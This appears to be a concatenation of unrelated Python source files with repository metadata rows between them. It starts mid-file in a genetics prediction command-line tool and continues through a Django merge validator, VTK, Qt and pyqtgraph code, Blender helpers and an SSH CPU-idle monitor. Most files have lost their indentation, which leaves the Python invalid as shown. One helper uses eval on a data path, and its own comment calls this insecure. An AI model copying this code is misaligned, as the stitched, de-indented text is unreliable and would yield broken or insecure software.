f += '{S}s'.format(S=s)
return f
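# Illustrative example of the reduce chain above: sec_to_str(3661.0) returns
# '1h:1m:1.0s'; days, hours and minutes are printed only when non-zero.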
class Logger(object):
'''Print to log file and stdout.'''
def __init__(self, fh):
self.log_fh = open(fh, 'wb', 0)
def log(self, msg, stdout=True):
'''Print to log file and stdout.'''
print >>self.log_fh, msg
if stdout:
x = str(msg).split('\n')
if len(x) > 20:
                msg = '\n'.join(x[:10])
msg += '\nOutput truncated. See log file for full list.'
sys.stdout.write(str(msg)+'\n')
sys.stdout.flush()
def close(self):
self.log_fh.close()
class ThrowingArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ValueError(message)
def print_help(self, masthead=True):
if masthead:
print MASTHEAD
argparse.ArgumentParser.print_help(self)
parser = ThrowingArgumentParser()
subparsers = parser.add_subparsers()
# eigendecomposition of LD matrices
eigen = subparsers.add_parser('ld', help='Calculate eigen-decompositions'
' of LD matrices.')
eigen.add_argument('--bfile', default=None, type=str, required=True,
help='Filename prefix for plink .bed/.bim/.fam fileset.')
ld_wind = eigen.add_mutually_exclusive_group(required=True)
ld_wind.add_argument('--ld-wind-snp', default=None, type=int, nargs=2,
help='First arg window size, second arg buffer size.'
' Units are # SNPs.',
metavar=('WIND', 'BUF'))
ld_wind.add_argument('--ld-wind-kb', default=None, type=int, nargs=2,
help='Not implemented yet.',
metavar=('WIND', 'BUF'))
ld_wind.add_argument('--ld-wind-cm', default=None, type=int, nargs=2,
help='Not implemented yet.',
metavar=('WIND', 'BUF'))
eigen.add_argument('--covar', default=None, type=str,
help='Covariates.')
eigen.add_argument('--out', default='mtpred', type=str,
help='Output filename prefix, default mtpred.')
# posterior mean beta
pmb = subparsers.add_parser('pmb', help='Convert summary statistics to '
'prediction weights.')
pmb.add_argument('--sumstats', default=None, type=str, required=True,
nargs='+',
help='List of filenames in .sumstats format containing GWAS '
'summary statistics.')
pmb.add_argument('--mat', default=None, type=str, required=True, nargs=2,
help='Genetic covariance matrix '
'followed by a sample overlap matrix.',
metavar=('VG', 'P'))
pmb.add_argument('--eigen-ld', default=None, type=str, required=True,
help='Pre-computed eigen-decomposition of the LD matrix'
' (from mypred.py ld).')
pmb.add_argument('--png', default=False, action='store_true',
help='Save per-normalized-genotype weights? ' +
'(default per-allele).')
pmb.add_argument('--out', default='mtpred', type=str,
help='Output filename prefix, default mtpred.')
pmb.add_argument('--block-buf', default=3, type=int,
help='Eigenblock buffer size.')
if __name__ == '__main__':
try:
args = parser.parse_args()
except ValueError: # override bad help msgs w/ subparsers
print MASTHEAD
ex_type, ex, tb = sys.exc_info()
print traceback.format_exc(ex)
parser.print_help(masthead=False)
sys.exit(2)
if args.out is None:
raise ValueError('--out is required.')
log = Logger(args.out+'.log')
start_time = time.time()
try:
opts = vars(args)
opts = {x: ' '.join([str(i) for i in opts[x]])
if type(opts[x]) is list
else opts[x] for x in
filter(lambda y: opts[y] is not None, opts)}
header = MASTHEAD
header += "\nOptions: \n"
options = [
' --' + x.replace('_', '-') + ' ' + str(opts[x]) for x in opts]
header += '\n'.join(options) + '\n'
log.log(header)
log.log('Beginning analysis at {T}'.format(T=time.ctime()))
try:
args.bfile
which = 'ld'
except AttributeError:
which = 'pmb'
if which == 'ld':
ld.eigenblocks(args, log)
elif which == 'pmb':
bayes.mtpred(args, log)
else:
log.log('Something went horribly wrong.')
except Exception:
ex_type, ex, tb = sys.exc_info()
log.log(traceback.format_exc(ex), stdout=False)
raise
finally:
log.log('Analysis finished at {T}'.format(T=time.ctime()))
time_elapsed = round(time.time() - start_time, 2)
log.log('Total time elapsed: {T}'.format(T=sec_to_str(time_elapsed)))
log.close()
| gpl-3.0 | 5,219,009,283,091,956,000 | 34.608187 | 78 | 0.549844 | false | 3.590212 | false | false | false |
damonkelley/django-name | name/validators.py | 1 | 2762 | from django.core.exceptions import ValidationError
def follow_merged_with(name):
"""A generator to get the merged_with relationship
of a Name object.
This will return a Name object until it reaches a Name that
does not have a merged_with relationship.
"""
    while name:
        merged_into = name.merged_with
        if merged_into:
            yield merged_into
        # Advance unconditionally so the loop ends once the chain runs out
        name = merged_into
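# Illustrative example (hypothetical names): if name_a.merged_with is name_b
# and name_b.merged_with is name_c (and name_c.merged_with is None), then
# list(follow_merged_with(name_a)) == [name_b, name_c].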
def validate_merged_with(name):
"""Validator for the merged_with ForeignKey field.
This will prevent two scenarios from occurring.
1. Merging with a nonexistent Name object.
2. Creating a loop of foreign key relationships.
For example:
Name 1 -> Name 2 -> Name 3 -> Name 1
We need to prevent this because navigating to a name that has
been merged with another, will redirect you to the Name it has
been merged with. If a loop is created, we will also create
the opportunity for an HTTP redirect loop.
Unlike typical Django validators, this requires a model instance
as a parameter, instead of the value, which in this case would have
been the ID of the related model. Because of this requirement, this
validator cannot be added via the `validator` kwarg on a ForeignKey
field. Rather this method should be called from the `clean` method.
"""
# Return early if there is no need to validate.
if name.merged_with is None:
return
# Get the Name class from the model instance, to avoid
# circular importing name.models.Name.
Name = name.__class__
# Prevent the user from attempting to merge with a nonexistent
# Name.
try:
merge_target = Name.objects.get(id=name.merged_with_id)
except Name.DoesNotExist:
raise ValidationError(
dict(merged_with=u'The merge target must exist.'))
# Prevent the user from attempting to merge a name with itself.
if name.merged_with_id == name.id:
raise ValidationError(
dict(merged_with=u'Unable to merge a Name with itself.'))
# Iterate through the generator and keep track of the return names.
# We will find a loop if the return name is already in
# merged_list. If this happens we will raise a validation error.
# If we don't find duplicates, then no loop has been created and
# the generator will raise it's own StopIteration and we will
# implicitly return.
merge_sequence = [name]
for name in follow_merged_with(merge_target):
if name in merge_sequence:
msg = (u'The specified merge action completes a merge loop. '
'Unable to complete merge.')
raise ValidationError(dict(merged_with=msg))
merge_sequence.append(name)
| bsd-3-clause | 8,021,655,770,274,407,000 | 37.361111 | 73 | 0.674873 | false | 4.476499 | false | false | false |
batearedcollie/seisTK | stk/hyperCubeUtility.py | 1 | 3401 | # Copyright 2017 Bateared Collie
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may
# be used to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from vtk.util import numpy_support
from stk.DataTypes import vtkHyperCube
import numpy as np
def hyperCubeGenerate(array=np.zeros([100,1]),
delta=[1.,1.],
origin=[0.,0.],
name="HyperCubeData",
copy=True
):
'''
    @summary: Generates a vtkHyperCube object from an input numpy array and axis information.
    @param array: input data array
    @type array: numpy nd array
    @param delta: sampling interval along each axis
    @type delta: [float]
    @param origin: origin coordinate along each axis
    @type origin: [float]
@param name: Name for data array
@type name: string
@param copy: perform a copy of the source array (turn this off at own risk)
@type copy: boolean
** Example Usage **
>>> import stk.generators as gen
>>> cube = gen.hyperCubeGenerate(array=np.zeros([10,20,5,6],dtype=np.float),
delta=[0.1,0.2,1.,2.],
origin=[-0.5,0.,-10.,3.],
)
.. warning::
        If you use copy=False then you should not try to access the
        source array after processing.
'''
# Check the axis number
nDim=len(array.shape)
if len(delta)!=nDim:
raise Exception("Delta length does not match array dimensions")
if len(origin)!=nDim:
raise Exception("Delta length does not match array dimensions")
tpD = vtkHyperCube()
tpD.SetNDimensions(nDim)
tpD.SetDimensions(np.flip(array.shape,0))
tpD.SetSpacing(delta)
tpD.SetOrigin(origin)
vtk_data = numpy_support.numpy_to_vtk(array.flatten(),deep=copy)
vtk_data.SetName(name)
tpD.GetPointData().SetScalars(vtk_data)
return tpD | bsd-3-clause | 5,139,039,446,379,599,000 | 36.384615 | 95 | 0.670391 | false | 4.235367 | false | false | false |
changbiao/pyExifToolGUI | scripts/ui/ui_export_metadata.py | 1 | 11160 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'export_metadata.ui'
#
# Created: Sun Dec 8 11:53:10 2013
# by: pyside-uic 0.2.14 running on PySide 1.1.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog_export_metadata(object):
def setupUi(self, Dialog_export_metadata):
Dialog_export_metadata.setObjectName("Dialog_export_metadata")
Dialog_export_metadata.resize(428, 438)
self.qdem_dialogButtonBox = QtGui.QDialogButtonBox(Dialog_export_metadata)
self.qdem_dialogButtonBox.setGeometry(QtCore.QRect(70, 390, 341, 32))
self.qdem_dialogButtonBox.setOrientation(QtCore.Qt.Horizontal)
self.qdem_dialogButtonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.qdem_dialogButtonBox.setObjectName("qdem_dialogButtonBox")
self.qdem_frame = QtGui.QFrame(Dialog_export_metadata)
self.qdem_frame.setGeometry(QtCore.QRect(20, 110, 351, 191))
self.qdem_frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.qdem_frame.setFrameShadow(QtGui.QFrame.Raised)
self.qdem_frame.setObjectName("qdem_frame")
self.gridLayoutWidget = QtGui.QWidget(self.qdem_frame)
self.gridLayoutWidget.setGeometry(QtCore.QRect(90, 40, 251, 141))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.rmdd_gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.rmdd_gridLayout.setContentsMargins(0, 0, 0, 0)
self.rmdd_gridLayout.setObjectName("rmdd_gridLayout")
self.qdem_chk_export_exif_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_exif_data.setObjectName("qdem_chk_export_exif_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_exif_data, 0, 0, 1, 1)
self.qdem_chk_export_xmp_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_xmp_data.setObjectName("qdem_chk_export_xmp_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_xmp_data, 1, 0, 1, 1)
self.qdem_chk_export_iptc_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_iptc_data.setObjectName("qdem_chk_export_iptc_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_iptc_data, 3, 0, 1, 1)
self.qdem_chk_export_gps_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_gps_data.setObjectName("qdem_chk_export_gps_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_gps_data, 2, 0, 1, 1)
self.qdem_chk_export_iccprofile_data = QtGui.QCheckBox(self.gridLayoutWidget)
self.qdem_chk_export_iccprofile_data.setObjectName("qdem_chk_export_iccprofile_data")
self.rmdd_gridLayout.addWidget(self.qdem_chk_export_iccprofile_data, 4, 0, 1, 1)
self.qdem_chk_export_all_metadata = QtGui.QCheckBox(self.qdem_frame)
self.qdem_chk_export_all_metadata.setGeometry(QtCore.QRect(20, 10, 162, 17))
self.qdem_chk_export_all_metadata.setObjectName("qdem_chk_export_all_metadata")
self.qdem_lbl = QtGui.QLabel(Dialog_export_metadata)
self.qdem_lbl.setGeometry(QtCore.QRect(20, 10, 391, 101))
self.qdem_lbl.setWordWrap(True)
self.qdem_lbl.setObjectName("qdem_lbl")
self.qdem_lbl2 = QtGui.QLabel(Dialog_export_metadata)
self.qdem_lbl2.setGeometry(QtCore.QRect(20, 310, 91, 16))
self.qdem_lbl2.setObjectName("qdem_lbl2")
self.horizontalLayoutWidget = QtGui.QWidget(Dialog_export_metadata)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(10, 330, 401, 41))
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setContentsMargins(10, -1, -1, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.qdem_txt_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_txt_radiobutton.setChecked(True)
self.qdem_txt_radiobutton.setObjectName("qdem_txt_radiobutton")
self.horizontalLayout.addWidget(self.qdem_txt_radiobutton)
self.qdem_tab_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_tab_radiobutton.setObjectName("qdem_tab_radiobutton")
self.horizontalLayout.addWidget(self.qdem_tab_radiobutton)
self.qdem_xml_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_xml_radiobutton.setObjectName("qdem_xml_radiobutton")
self.horizontalLayout.addWidget(self.qdem_xml_radiobutton)
self.qdem_html_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_html_radiobutton.setObjectName("qdem_html_radiobutton")
self.horizontalLayout.addWidget(self.qdem_html_radiobutton)
self.qdem_xmp_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_xmp_radiobutton.setObjectName("qdem_xmp_radiobutton")
self.horizontalLayout.addWidget(self.qdem_xmp_radiobutton)
self.qdem_csv_radiobutton = QtGui.QRadioButton(self.horizontalLayoutWidget)
self.qdem_csv_radiobutton.setEnabled(True)
self.qdem_csv_radiobutton.setObjectName("qdem_csv_radiobutton")
self.horizontalLayout.addWidget(self.qdem_csv_radiobutton)
self.retranslateUi(Dialog_export_metadata)
QtCore.QObject.connect(self.qdem_dialogButtonBox, QtCore.SIGNAL("accepted()"), Dialog_export_metadata.accept)
QtCore.QObject.connect(self.qdem_dialogButtonBox, QtCore.SIGNAL("rejected()"), Dialog_export_metadata.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog_export_metadata)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_all_metadata, self.qdem_chk_export_exif_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_exif_data, self.qdem_chk_export_xmp_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_xmp_data, self.qdem_chk_export_gps_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_gps_data, self.qdem_chk_export_iptc_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_iptc_data, self.qdem_chk_export_iccprofile_data)
Dialog_export_metadata.setTabOrder(self.qdem_chk_export_iccprofile_data, self.qdem_txt_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_txt_radiobutton, self.qdem_tab_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_tab_radiobutton, self.qdem_xml_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_xml_radiobutton, self.qdem_html_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_html_radiobutton, self.qdem_xmp_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_xmp_radiobutton, self.qdem_csv_radiobutton)
Dialog_export_metadata.setTabOrder(self.qdem_csv_radiobutton, self.qdem_dialogButtonBox)
def retranslateUi(self, Dialog_export_metadata):
Dialog_export_metadata.setWindowTitle(QtGui.QApplication.translate("Dialog_export_metadata", "Export metadata", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_exif_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export exif data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_xmp_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export xmp data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_iptc_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export iptc data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_gps_data.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "gps data can be both in exif and xmp data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_gps_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export gps data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_iccprofile_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export ICC profile", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_all_metadata.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "(Un)Check this value will (un)check all underlying values", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_all_metadata.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export all metadata", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_lbl.setText(QtGui.QApplication.translate("Dialog_export_metadata", "This option gives you the possibility to export the metadata from your selected photo(s). A number of formats is supported.\n"
"All formats give an export file per selected photo, apart from csv which will give you one (big) csv file for all selected photos.", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_lbl2.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export to:", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_txt_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a simple text output per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_txt_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Txt", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_tab_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a tab separated text output per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_tab_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "tab", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xml_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you an xml formatted output file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xml_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "xml", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_html_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a table formatted html file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_html_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "html", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xmp_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you an xmp structured file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xmp_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "xmp", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_csv_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you one csv file for the selected photos", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_csv_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "csv", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -1,964,207,848,574,446,800 | 87.571429 | 212 | 0.751703 | false | 3.48859 | false | false | false |
benvermaercke/pyqtgraph | examples/GLScatterPlotItem.py | 28 | 2864 | # -*- coding: utf-8 -*-
"""
Demonstrates use of GLScatterPlotItem with rapidly-updating plots.
"""
## Add path to library (just for examples; you do not need this)
import initExample
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import numpy as np
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.opts['distance'] = 20
w.show()
w.setWindowTitle('pyqtgraph example: GLScatterPlotItem')
g = gl.GLGridItem()
w.addItem(g)
##
## First example is a set of points with pxMode=False
## These demonstrate the ability to have points with real size down to a very small scale
##
pos = np.empty((53, 3))
size = np.empty((53))
color = np.empty((53, 4))
pos[0] = (1,0,0); size[0] = 0.5; color[0] = (1.0, 0.0, 0.0, 0.5)
pos[1] = (0,1,0); size[1] = 0.2; color[1] = (0.0, 0.0, 1.0, 0.5)
pos[2] = (0,0,1); size[2] = 2./3.; color[2] = (0.0, 1.0, 0.0, 0.5)
z = 0.5
d = 6.0
for i in range(3,53):
pos[i] = (0,0,z)
size[i] = 2./d
color[i] = (0.0, 1.0, 0.0, 0.5)
z *= 0.5
d *= 2.0
sp1 = gl.GLScatterPlotItem(pos=pos, size=size, color=color, pxMode=False)
sp1.translate(5,5,0)
w.addItem(sp1)
##
## Second example shows a volume of points with rapidly updating color
## and pxMode=True
##
pos = np.random.random(size=(100000,3))
pos *= [10,-10,10]
pos[0] = (0,0,0)
color = np.ones((pos.shape[0], 4))
d2 = (pos**2).sum(axis=1)**0.5
size = np.random.random(size=pos.shape[0])*10
sp2 = gl.GLScatterPlotItem(pos=pos, color=(1,1,1,1), size=size)
phase = 0.
w.addItem(sp2)
##
## Third example shows a grid of points with rapidly updating position
## and pxMode = False
##
pos3 = np.zeros((100,100,3))
pos3[:,:,:2] = np.mgrid[:100, :100].transpose(1,2,0) * [-0.1,0.1]
pos3 = pos3.reshape(10000,3)
d3 = (pos3**2).sum(axis=1)**0.5
sp3 = gl.GLScatterPlotItem(pos=pos3, color=(1,1,1,.3), size=0.1, pxMode=False)
w.addItem(sp3)
def update():
## update volume colors
global phase, sp2, d2
s = -np.cos(d2*2+phase)
color = np.empty((len(d2),4), dtype=np.float32)
color[:,3] = np.clip(s * 0.1, 0, 1)
color[:,0] = np.clip(s * 3.0, 0, 1)
color[:,1] = np.clip(s * 1.0, 0, 1)
color[:,2] = np.clip(s ** 3, 0, 1)
sp2.setData(color=color)
phase -= 0.1
## update surface positions and colors
global sp3, d3, pos3
z = -np.cos(d3*2+phase)
pos3[:,2] = z
color = np.empty((len(d3),4), dtype=np.float32)
color[:,3] = 0.3
color[:,0] = np.clip(z * 3.0, 0, 1)
color[:,1] = np.clip(z * 1.0, 0, 1)
color[:,2] = np.clip(z ** 3, 0, 1)
sp3.setData(pos=pos3, color=color)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(50)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| mit | 5,845,931,509,583,227,000 | 24.345133 | 91 | 0.603701 | false | 2.433305 | false | false | false |
ibarbech/learnbot | learnbot_dsl/guis/help.py | 1 | 3411 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/ivan/robocomp/components/learnbot/learnbot_dsl/guis/help.ui',
# licensing of '/home/ivan/robocomp/components/learnbot/learnbot_dsl/guis/help.ui' applies.
#
# Created: Thu Mar 7 12:39:25 2019
# by: pyside2-uic running on PySide2 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_Help(object):
def setupUi(self, Help):
Help.setObjectName("Help")
Help.resize(902, 734)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Help.sizePolicy().hasHeightForWidth())
Help.setSizePolicy(sizePolicy)
self.horizontalLayout = QtWidgets.QHBoxLayout(Help)
self.horizontalLayout.setObjectName("horizontalLayout")
self.splitter = QtWidgets.QSplitter(Help)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setObjectName("splitter")
self.treeWidget = QtWidgets.QTreeWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.treeWidget.sizePolicy().hasHeightForWidth())
self.treeWidget.setSizePolicy(sizePolicy)
self.treeWidget.setObjectName("treeWidget")
self.treeWidget.headerItem().setText(0, "1")
self.verticalLayoutWidget = QtWidgets.QWidget(self.splitter)
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.layoutWebKit = QtWidgets.QVBoxLayout()
self.layoutWebKit.setObjectName("layoutWebKit")
self.verticalLayout.addLayout(self.layoutWebKit)
self.horizontalLayoutButtons = QtWidgets.QHBoxLayout()
self.horizontalLayoutButtons.setObjectName("horizontalLayoutButtons")
self.pushButtonPrevious = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButtonPrevious.setObjectName("pushButtonPrevious")
self.horizontalLayoutButtons.addWidget(self.pushButtonPrevious)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayoutButtons.addItem(spacerItem)
self.pushButtoNext = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButtoNext.setObjectName("pushButtoNext")
self.horizontalLayoutButtons.addWidget(self.pushButtoNext)
self.verticalLayout.addLayout(self.horizontalLayoutButtons)
self.horizontalLayout.addWidget(self.splitter)
self.retranslateUi(Help)
QtCore.QMetaObject.connectSlotsByName(Help)
def retranslateUi(self, Help):
Help.setWindowTitle(QtWidgets.QApplication.translate("Help", "Help", None, -1))
self.pushButtonPrevious.setText(QtWidgets.QApplication.translate("Help", "Previous", None, -1))
self.pushButtoNext.setText(QtWidgets.QApplication.translate("Help", "Next", None, -1))
| gpl-3.0 | 1,551,152,030,710,378,800 | 53.142857 | 121 | 0.742011 | false | 4.301387 | false | false | false |
nocarryr/blender-scripts | multicam_tools/utils.py | 1 | 2424 | import bpy
def get_full_data_path(bpy_obj):
return repr(bpy_obj)
def get_bpy_obj_from_data_path(data_path):
## TODO: this is hackish and insecure
return eval(data_path)
def get_active_strip(context=None):
if context is None:
context = bpy.context
return context.scene.sequence_editor.active_strip
def get_fcurve(scene, data_path):
action = scene.animation_data.action
if action is None:
return None
for fc in action.fcurves:
if fc.data_path == data_path:
return fc
def create_fcurve(scene, data_path, action_group=''):
action = scene.animation_data.action
if action is None:
return None
return action.fcurves.new(data_path, action_group=action_group)
def get_or_create_fcurve(scene, data_path, action_group=''):
fc = get_fcurve(scene, data_path)
if fc is not None:
return fc
return create_fcurve(scene, data_path, action_group)
def set_keyframe(fcurve, frame, value, interpolation='CONSTANT'):
kf = fcurve.keyframe_points.insert(frame, value)
kf.interpolation = interpolation
return kf
def get_keyframe(fcurve, *frames):
if len(frames) > 1:
keyframes = []
else:
keyframes = None
for kf in fcurve.keyframe_points:
if kf.co[0] in frames:
if keyframes is not None:
keyframes.append(kf)
else:
return kf
return keyframes
def iter_keyframes(**kwargs):
fcurves = kwargs.get('fcurves')
if fcurves is None:
scene = kwargs.get('scene')
action = scene.animation_data.action
fcurves = action.fcurves
for fc in fcurves:
for kf in fc.keyframe_points:
yield kf, fc
def get_keyframe_dict(**kwargs):
d = {}
for kf, fc in iter_keyframes(**kwargs):
        # Keyframe objects are not subscriptable; the frame is co[0]
        frame = kf.co[0]
if frame not in d:
d[frame] = {}
d[frame][fc.data_path] = {'keyframe':kf, 'fcurve':fc}
return d
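# Resulting structure (illustrative):
#   {frame: {fcurve.data_path: {'keyframe': kf, 'fcurve': fc}, ...}, ...}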
class MultiCamContext:
@classmethod
def poll(cls, context):
if context.area.type != 'SEQUENCE_EDITOR':
return 0
active_strip = get_active_strip(context)
if active_strip is None:
return 0
if active_strip.type != 'MULTICAM':
return 0
return 1
def get_strip(self, context):
return get_active_strip(context)
| gpl-2.0 | -932,779,351,380,638,100 | 27.517647 | 67 | 0.60066 | false | 3.591111 | false | false | false |
Runbook/runbook | src/monitors/checks/cpu-idle/__init__.py | 2 | 1522 | from fabric.api import hide, run, env
import time
import json
def run_cmd(cmd):
with hide('output', 'running', 'warnings'):
return run(cmd, timeout=1200)
def check(**kwargs):
''' Login over SSH and execute shell command '''
jdata = kwargs['jdata']
logger = kwargs['logger']
env.gateway = jdata['data']['gateway']
env.host_string = jdata['data']['host_string']
env.user = jdata['data']['username']
env.key = jdata['data']['sshkey']
env.shell = "/bin/sh -c"
env.disable_known_hosts = True
env.warn_only = True
env.abort_on_prompts = True
results = run_cmd("uname -a")
if results.succeeded:
if "FreeBSD" in results:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
                # FreeBSD vmstat reports the idle percentage in the last column
                cpu_idle = float(vmstat_info[-1])
else:
return None
else:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
                # Linux vmstat ends with 'id wa st' columns, so idle is third
                # from the end (assumes a vmstat that reports steal time)
                cpu_idle = float(vmstat_info[-3])
else:
return None
else:
return None
threshold = float(jdata['data']['threshold'])
logger.debug("cpu-idle: Idle {0} Threshold {1}".format(cpu_idle, threshold))
if cpu_idle > threshold:
return True
else:
return False
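# Illustrative example: with a threshold of "20" in jdata, an idle reading of
# 85.0 returns True (enough idle CPU); a reading of 5.0 returns False.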
| apache-2.0 | 4,752,785,440,156,244,000 | 29.44 | 80 | 0.54205 | false | 3.872774 | false | false | false |
